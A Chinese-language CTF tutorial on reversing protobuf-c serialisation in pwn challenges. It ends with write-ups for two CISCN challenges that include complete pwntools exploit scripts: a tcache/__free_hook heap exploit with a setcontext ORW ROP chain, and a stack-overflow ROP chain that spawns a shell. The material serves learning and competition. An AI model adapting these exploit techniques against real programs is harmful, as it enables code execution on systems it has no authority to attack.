- protobuf
- 实例:
- 例题1:[CISCN 2023 初赛]StrangeTalkBot
- 分析:
- 思路:
- 利用:
- 例题2:[CISCN 2024]protoverflow
- 分析:
Protocol Buffers,是Google公司开发的一种
,然后构造序列化后的Protobuf与程序进行交互。 -
tar -xzvf protobuf-c.tar.gz cd protobuf-c ./configure && make sudo make install
protoc例子,example 后面会和类名相关,后面会生成两个文件message.pb-c.c,message.pb-c.h:
syntax = "proto3"; package example;message Person {string name = 1;int32 id = 2;string email = 3; }
Example__Person 类,.c文件中有一系列函数,序列化和反序列话的时候会使用,这里生成的结构中额外多了一个
ProtobufCMessage base
,表示的是每个 Protobuf-C 消息结构体所包含的一个基础消息部分。这个基础消息部分提供了一些通用的元数据和函数,用于支持 Protobuf-C 的内部操作,如序列化(packing)、反序列化(unpacking)以及内存管理等(后面在调试的时候会看到这个位置指向了哪里):ProtobufCMessage 结构体的内容
struct ProtobufCMessage {/** The descriptor for this message type. */const ProtobufCMessageDescriptor *descriptor;/** The number of elements in `unknown_fields`. */unsigned n_unknown_fields;/** The fields that weren't recognized by the parser. */ProtobufCMessageUnknownField *unknown_fields; };
额外关注两个结构体,这里包含了前面文件中定义的变量的 所有信息,名称、id、tabel,type等:
static const ProtobufCFieldDescriptor example__person__field_descriptors[3] ={{"name",1,PROTOBUF_C_LABEL_NONE,PROTOBUF_C_TYPE_STRING,0, /* quantifier_offset */offsetof(Example__Person, name),NULL,&protobuf_c_empty_string,0, /* flags */0, NULL, NULL /* reserved1,reserved2, etc */},{"id",2,PROTOBUF_C_LABEL_NONE,PROTOBUF_C_TYPE_INT32,0, /* quantifier_offset */offsetof(Example__Person, id),NULL,NULL,0, /* flags */0, NULL, NULL /* reserved1,reserved2, etc */},{"email",3,PROTOBUF_C_LABEL_NONE,PROTOBUF_C_TYPE_STRING,0, /* quantifier_offset */offsetof(Example__Person, email),NULL,&protobuf_c_empty_string,0, /* flags */0, NULL, NULL /* reserved1,reserved2, etc */}, };
中包含了 上面 变量的个数 和编译后Example__Person结构的大小
const ProtobufCMessageDescriptor example__person__descriptor ={PROTOBUF_C__MESSAGE_DESCRIPTOR_MAGIC,"example.Person","Person","Example__Person","example",sizeof(Example__Person),3,example__person__field_descriptors,example__person__field_indices_by_name,1, example__person__number_ranges,(ProtobufCMessageInit)example__person__init,NULL, NULL, NULL /* reserved[123] */ };
看一下 ProtobufCFieldDescriptor 和 ProtobufCMessageDescriptor 结构体的原型:
/*** Describes a single field in a message. 描述消息中的单个字段*/ struct ProtobufCFieldDescriptor {/** Name of the field as given in the .proto file. */const char *name;/** Tag value of the field as given in the .proto file. */uint32_t id; //唯一标识一个字段/** Whether the field is `REQUIRED`, `OPTIONAL`, or `REPEATED`. */ProtobufCLabel label;/** The type of the field. */ProtobufCType type; //标识该字段的类型/*** The offset in bytes of the message's C structure's quantifier field* (the `has_MEMBER` field for optional members or the `n_MEMBER` field* for repeated members or the case enum for oneofs).*/unsigned quantifier_offset; //表示该字段 在编译后的结构体中的偏移/*** The offset in bytes into the message's C structure for the member* itself.*/unsigned offset;/*** A type-specific descriptor.** If `type` is `PROTOBUF_C_TYPE_ENUM`, then `descriptor` points to the* corresponding `ProtobufCEnumDescriptor`.** If `type` is `PROTOBUF_C_TYPE_MESSAGE`, then `descriptor` points to* the corresponding `ProtobufCMessageDescriptor`.** Otherwise this field is NULL.*/const void *descriptor; /* for MESSAGE and ENUM types *//** The default value for this field, if defined. May be NULL. */const void *default_value;/*** A flag word. Zero or more of the bits defined in the* `ProtobufCFieldFlag` enum may be set.*/uint32_t flags;/** Reserved for future use. */unsigned reserved_flags;/** Reserved for future use. */void *reserved2;/** Reserved for future use. */void *reserved3; };/*** Describes a message. 描述消息整个消息*/ struct ProtobufCMessageDescriptor {/** Magic value checked to ensure that the API is used correctly. */uint32_t magic;/** The qualified name (e.g., "namespace.Type"). */const char *name;/** The unqualified name as given in the .proto file (e.g., "Type"). */const char *short_name;/** Identifier used in generated C code. */const char *c_name;/** The dot-separated namespace. */const char *package_name;/*** Size in bytes of the C structure representing an instance of this* type of message.*/size_t sizeof_message;/** Number of elements in `fields`. */ //整个消息中 元素数个数unsigned n_fields;/** Field descriptors, sorted by tag number. */ //字段描述符,按标签编号排序,指向第一个字段const ProtobufCFieldDescriptor *fields;/** Used for looking up fields by name. */const unsigned *fields_sorted_by_name;/** Number of elements in `field_ranges`. */unsigned n_field_ranges;/** Used for looking up fields by id. */const ProtobufCIntRange *field_ranges;/** Message initialisation function. */ProtobufCMessageInit message_init;/** Reserved for future use. */void *reserved1;/** Reserved for future use. */void *reserved2;/** Reserved for future use. */void *reserved3; };
ProtobufCType 结构体(type) 指定了字段的类型:
typedef enum { 0 PROTOBUF_C_TYPE_INT32, /**< int32 */ 1 PROTOBUF_C_TYPE_SINT32, /**< signed int32 */ 2 PROTOBUF_C_TYPE_SFIXED32, /**< signed int32 (4 bytes) */ 3 PROTOBUF_C_TYPE_INT64, /**< int64 */ 4 PROTOBUF_C_TYPE_SINT64, /**< signed int64 */ 5 PROTOBUF_C_TYPE_SFIXED64, /**< signed int64 (8 bytes) */ 6 PROTOBUF_C_TYPE_UINT32, /**< unsigned int32 */ 7 PROTOBUF_C_TYPE_FIXED32, /**< unsigned int32 (4 bytes) */ 8 PROTOBUF_C_TYPE_UINT64, /**< unsigned int64 */ 9 PROTOBUF_C_TYPE_FIXED64, /**< unsigned int64 (8 bytes) */ 0xa PROTOBUF_C_TYPE_FLOAT, /**< float */ 0xb PROTOBUF_C_TYPE_DOUBLE, /**< double */ 0xc PROTOBUF_C_TYPE_BOOL, /**< boolean */ 0xd PROTOBUF_C_TYPE_ENUM, /**< enumerated type */ 0xe PROTOBUF_C_TYPE_STRING, /**< UTF-8 or ASCII string */ 0xf PROTOBUF_C_TYPE_BYTES, /**< arbitrary byte sequence */ 0x10 PROTOBUF_C_TYPE_MESSAGE, /**< nested message */ } ProtobufCType;
ProtobufCLabel 结构(label) 指定了字段的性质:
typedef enum {/** A well-formed message must have exactly one of this field. *///格式正确的消息必须具有此字段PROTOBUF_C_LABEL_REQUIRED,/*** A well-formed message can have zero or one of this field (but not* more than one).*///格式正确的消息可以有零个或一个此字段(但不能超过一个)PROTOBUF_C_LABEL_OPTIONAL,/*** This field can be repeated any number of times (including zero) in a* well-formed message. The order of the repeated values will be* preserved.*///此字段可以在格式正确的消息中重复任意次数(包括零)。将保留重复值的顺序PROTOBUF_C_LABEL_REPEATED,/*** This field has no label. This is valid only in proto3 and is* equivalent to OPTIONAL but no "has" quantifier will be consulted.*///此字段没有标签。这仅在proto3中有效,等效于 OPTIONAL,但不查询"has"量词(proto3中没有has量词)。PROTOBUF_C_LABEL_NONE, } ProtobufCLabel;
后面题目中要用到的 ProtobufCBinaryData 结构体:
struct ProtobufCBinaryData {size_t len; /**< Number of bytes in the `data` field. */uint8_t *data; /**< Data bytes. */ };
用上面的message1.pb-c.h库来 写一个c程序,对信息进行序列化(pack)输出,并反序列化(unpack):
#gcc message.pb-c.c test.c -o test -lprotobuf-c#include <stdio.h> #include <stdlib.h> #include <string.h> #include "message.pb-c.h"int main() {// 创建一个 Person 消息实例Example__Person person = EXAMPLE__PERSON__INIT;// 设置消息字段person.name = strdup("John Doe");person.id = 1234;person.email = strdup("john.doe@example.com");// 序列化消息uint8_t buffer[1024]; // 假设1024字节足够存放序列化后的数据size_t len = example__person__pack(&person, buffer);// 打印序列化后的数据for (size_t i = 0; i < len; i++){printf("%02X ", buffer[i]);}printf("\n");// 反序列化消息Example__Person *new_person = example__person__unpack(NULL, len, buffer);// 访问反序列化后的消息字段printf("Name: %s\n", new_person->name);printf("ID: %d\n", new_person->id);printf("Email: %s\n", new_person->email);// 清理free((void *)person.name);free((void *)person.email);example__person__free_unpacked(new_person, NULL);return 0; }
unpack_person + 0x18
处取指针输出的看一下 ProtobufCMessageDescriptor 在ida中的结构,和.c文件中的一样,跟着fields字段来到一个字段的位置:
- label --> 3 --> PROTOBUF_C_LABEL_NONE
- type --> 0xe --> PROTOBUF_C_TYPE_STRING:
- offsetof --> 0x18 (这里和上面ida反编译的源代码中 name字段中0x18开始输出刚好符合)
后面 id字段和email字段是一样的分析方法。
从这里开始序列化,看到传入的参数0x7fffffffddf0 指向的结构体是Example__Person,结构体的原型是:
struct Example__Person {ProtobufCMessage base;char *name;int32_t id;char *email; };
解码后返回了一个Example__Person 结构体指针指向下面这段堆空间,这里观察就可以发现,内容和序列化之前一样,前面的0x18个位置留给了base字段,后续为name、id、email:
综上,在ida中只要我们提取出了ProtobufCFieldDescriptor 结构体数组中每个元素的
,就能借助protoc得出原proto文件中各个字段的信息 -
任然是刚才那个.proto源文件,来生成python包 ==> message_pb2.py:
protoc --python_out=. message.proto
import message_pb2msg = message_pb2.Person() # 生成对象,这里的函数名和.proto文件中的类名一样 msg.name = "John Doe" msg.id = 1234 msg.email = "john.doe@example.com" data = msg.SerializeToString() print(data) for i in range(len(data)):print("{:0>2}".format(hex(data[i])[2:]),end=" ")
(pwn比赛中一般都是这样) ,: -
:#g++ -o my_program test.cpp message.pb.cc `pkg-config --cflags --libs protobuf`#include <iostream> #include <iomanip> #include <sstream> #include <string> #include "message.pb.h" // 确保这个头文件路径正确int main() {example::Person message; //包名和类名用.proto源文件中的message.set_id(123);message.set_name("Example");message.set_email("bkbqwq.com");// 序列化std::string serialized_data;if (!message.SerializeToString(&serialized_data)){std::cerr << "Failed to serialize the message." << std::endl;return -1;}// 打印序列化数据的十六进制表示std::cout << "Serialized data: ";for (size_t i = 0; i < serialized_data.size(); ++i){std::cout << std::hex << std::setw(2) << std::setfill('0') << (int)(unsigned char)serialized_data[i];if (i != serialized_data.size() - 1){std::cout << " ";}}std::cout << std::endl;// 反序列化example::Person new_message;if (!new_message.ParseFromString(serialized_data)){std::cerr << "Failed to parse the serialized data." << std::endl;return -1;}// 验证反序列化结果if (new_message.id() == 123 &&new_message.name() == "Example" &&new_message.email() == "bkbqwq.com"){std::cout << "Deserialization successful, data matches original." << std::endl;}else{std::cerr << "Deserialization failed, data does not match original." << std::endl;}return 0; }
syntax = "proto2";package example;enum SomeEnum {VALUE_A = 0;VALUE_B = 1; }message Person {required int32 id = 1;required string name = 2;required string email = 3;required int64 id1 = 4;optional uint32 id2 = 5;optional uint64 id3 = 6;optional sint32 id4 = 7;optional sint64 id5 = 8;optional fixed32 id6 = 9;optional fixed64 id7 = 10;optional sfixed32 id8 = 11;optional sfixed64 id9 = 12;optional bool id10 = 13;optional string id11 = 14;optional bytes id12 = 15;optional float id13 = 16;optional double id14 = 17;optional SomeEnum id15 = 18;optional group Id16 = 19 { //这里组名要大写// 在这里定义组内的字段optional int32 subfield1 = 20;optional string subfield2 = 21;} }
label: 1 --> optional 2 --> required 3 --> repeatedtype: 1 --> double 2 --> float 3 --> int64 4 --> uint64 5 --> int32 6 --> fixed64 7 --> fixed32 8 --> bool 9 --> string 0xa --> group 0xb --> MESSAGE 0xc --> bytes 0xd --> uint32 0xe --> enum 0xf --> sfixed32 0x10 --> sfixed64 0x11 --> sint32 0x12 --> sint64
这两个类型,这里就不多分析了,给一张在ida中的图看看:Id16 group:
id15 enum:
例题1:[CISCN 2023 初赛]StrangeTalkBot
题目地址:[CISCN 2023 初赛]StrangeTalkBot | NSSCTF
- id --> 1
- type --> 4 --> PROTOBUF_C_TYPE_SINT64
syntax = "proto2"; package bkbqwq; message devicemsg {required sint64 actionid = 1;required sint64 msgidx = 2;required sint64 msgsize = 3;required bytes msgcontent = 4; }
protoc --python_out=. bkb.proto
- 利用unsorted bin泄漏libc地址、和堆地址 --> 修改next指针,申请到free_hook,覆盖指向gadget --> 在堆上伪造三个东西:ORW、setcontext + 61 栈迁移时寄存器传参、触发free_hook时gadget 完成rdi 到 rdx 的转换 --> free前面伪造的堆 触发攻击
from pwn import * import bkb_pb2 context(os='linux', arch='amd64', log_level='debug') def debug():gdb.attach(p)choose = 1if choose == 1 : # 远程success("远程")p = remote("node4.anna.nssctf.cn",28888)libc = ELF('./lib/libc_2.31-0ubuntu9.9_amd64.so')# elf = ELF("./pwn") else : # 本地success("本地")p = process("./pwn")libc = ELF('/home/kali/Desktop/glibc-all-in-one/libs/2.31-0ubuntu9_amd64/libc-2.31.so')# ld = ELF("ld.so") # elf = ELF("./pwn")def add(index,size,content):msg = bkb_pb2.devicemsg() # 生成对象msg.actionid = 1msg.msgidx = indexmsg.msgsize = sizemsg.msgcontent = contentp.sendafter(b'You can try to have friendly communication with me now: ', msg.SerializeToString())def edit(index,content):msg = bkb_pb2.devicemsg()msg.actionid = 2msg.msgidx = indexmsg.msgsize = len(content)msg.msgcontent = contentp.sendafter(b'You can try to have friendly communication with me now: ', msg.SerializeToString())def show(index):msg = bkb_pb2.devicemsg()msg.actionid = 3msg.msgidx = indexmsg.msgsize = 7msg.msgcontent = b'useless'p.sendafter(b'You can try to have friendly communication with me now: ', msg.SerializeToString())def free(index):msg = bkb_pb2.devicemsg()msg.actionid = 4msg.msgidx = indexmsg.msgsize = 7msg.msgcontent = b'useless'p.sendafter(b'now: ', msg.SerializeToString())# 泄漏libc地址 for i in range(6):add(i,0xf0,b"./flag\x00") add(7,0xf0,b"FFFF") # 用来泄漏libc地址 add(6,0xf0,b"FFFF")for i in range(8):free(i)show(7) p.recv() addr = u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b'\x00')) libc_base = addr - libc.symbols["__malloc_hook"] - 0x70 success("libc_base ==>" + hex(libc_base))#计算__free_hook和system地址 setcontext_addr = libc_base + libc.sym["setcontext"] + 61 system_addr = libc_base + libc.sym["system"] IO_2_1_stdout_addr = libc_base + libc.sym["_IO_2_1_stdout_"] IO_list_all_addr = libc_base + libc.sym["_IO_list_all"] IO_wfile_jumps_addr= libc_base + libc.sym["_IO_wfile_jumps"] IO_2_1_stderr_addr= libc_base + libc.sym["_IO_2_1_stderr_"] free_hook_addr= libc_base + libc.sym["__free_hook"]# rtld_global_addr = ld_base + ld.sym["_rtld_global"] # IO_wfile_jumps_addr = libc_base + 0x1E4F80success("system_addr ==>" + hex(system_addr)) success("setcontext_addr ==>" + hex(setcontext_addr)) success("IO_2_1_stdout_addr ==>" + hex(IO_2_1_stdout_addr)) success("IO_list_all_addr ==>" + hex(IO_list_all_addr)) success("IO_wfile_jumps_addr==>" + hex(IO_wfile_jumps_addr)) success("free_hook_addr ==>" + hex(free_hook_addr)) success("IO_2_1_stderr_addr ==>" + hex(IO_2_1_stderr_addr))open_addr = libc.sym['open']+libc_base read_addr = libc.sym['read']+libc_base write_addr= libc.sym['write']+libc_base mmap_addr = libc.sym['mmap'] +libc_base writev_addr = libc_base + libc.sym['writev']# 泄漏堆地址 show(0) p.recv() addr = u64(p.recvuntil(b"\x55")[-6:].ljust(8,b'\x00')) heap_addr = addr - 0x10 success("heap_addr ==>" + hex(heap_addr)) pause()# ========== ORW ==========pop_rdi_ret = libc_base + 0x0000000000023b6a pop_rdx_r12_ret = libc_base + 0x0000000000119211 pop_rax_ret = libc_base + 0x0000000000036174 pop_rsi_ret = libc_base + 0x000000000002601f # pop_rcx_rbx_ret = libc_base + 0x00000000000fc104 # pop_r8_ret = libc_base + 0x148686 ret= libc_base + 0x000000000002601f+1# ORW syscall = read_addr+14 flag = heap_addr+0x2F0# open(0,flag) orw =p64(pop_rdi_ret)+p64(flag) orw+=p64(pop_rsi_ret)+p64(0) orw+=p64(pop_rax_ret)+p64(2) orw+=p64(syscall) # orw =p64(pop_rdi_ret)+p64(flag) # orw+=p64(pop_rsi_ret)+p64(0) # orw+=p64(open_addr)# read(3,heap+0x1010,0x30) orw+=p64(pop_rdi_ret)+p64(3) orw+=p64(pop_rsi_ret)+p64(heap_addr+0x1010) # 从地址 读出flag orw+=p64(pop_rdx_r12_ret)+p64(0x30)+p64(0) orw+=p64(read_addr) # write(1,heap+0x1010,0x30) orw+=p64(pop_rdi_ret)+p64(1) orw+=p64(pop_rsi_ret)+p64(heap_addr+0x1010) # 从地址 读出flag orw+=p64(pop_rdx_r12_ret)+p64(0x30)+p64(0) orw+=p64(write_addr) orw+=b"./flag\x00" add(5,0xf0,orw) # 填入ORW# 申请chunk到free_hook 天入gadget 并准备chunk进行栈迁移 new_chunk = heap_addr + 0xD20 gadget_rdi_rdx = 0x0000000000151990 + libc_baseedit(6,p64(free_hook_addr-0x8)) #修改next指针 payload = p64(0) + p64(new_chunk) + p64(0)*2 + p64(setcontext_addr) payload = payload.ljust(0xa0,b"\x00") payload += p64(heap_addr + 0x11F0) + p64(ret)add(9,0xf0,payload) add(10,0xf0,p64(0) + p64(gadget_rdi_rdx)) # 修该free_hookfree(9) # 触发 p.interactive()
例题2:[CISCN 2024]protoverflow
syntax = "proto2"; package bkb;message devicemsg {optional string name = 1;optional string phoneNumber = 2;required bytes buffer = 3;required uint32 size = 4; }
from pwn import * import lzl_pb2 context(os='linux', arch='amd64', log_level='debug')def debug():gdb.attach(p)choose = 0if choose == 1 : # 远程success("远程")p = remote("node4.anna.nssctf.cn",28888)libc = ELF('./lib/libc_2.31-0ubuntu9.9_amd64.so')# elf = ELF("./pwn") else : # 本地success("本地")p = process("./pwn")libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')# ld = ELF("ld.so") # elf = ELF("./pwn")def create_payload(name,phoneNumber,buffer,size):msg = lzl_pb2.protoMessage()msg.name = namemsg.phoneNumber = phoneNumbermsg.buffer = buffermsg.size = sizereturn msg.SerializeToString()p.recvuntil(b"Gift: ") libc_base = eval(p.recv(14)) - libc.symbols["puts"] success("libc_base ==>"+hex(libc_base))system_addr = libc_base + libc.sym["system"] sh_addr = libc_base + next(libc.search(b"/bin/sh")) success("system_addr==>"+hex(system_addr)) success("sh_addr==>"+hex(sh_addr))pop_rdi = 0x0000000000028215 + libc_base pb = b"a"*(0x210+8) + p64(pop_rdi+1) + p64(pop_rdi) + p64(sh_addr) + p64(system_addr) payload = create_payload("lzl","6",pb,len(pb)) p.send(payload)p.interactive()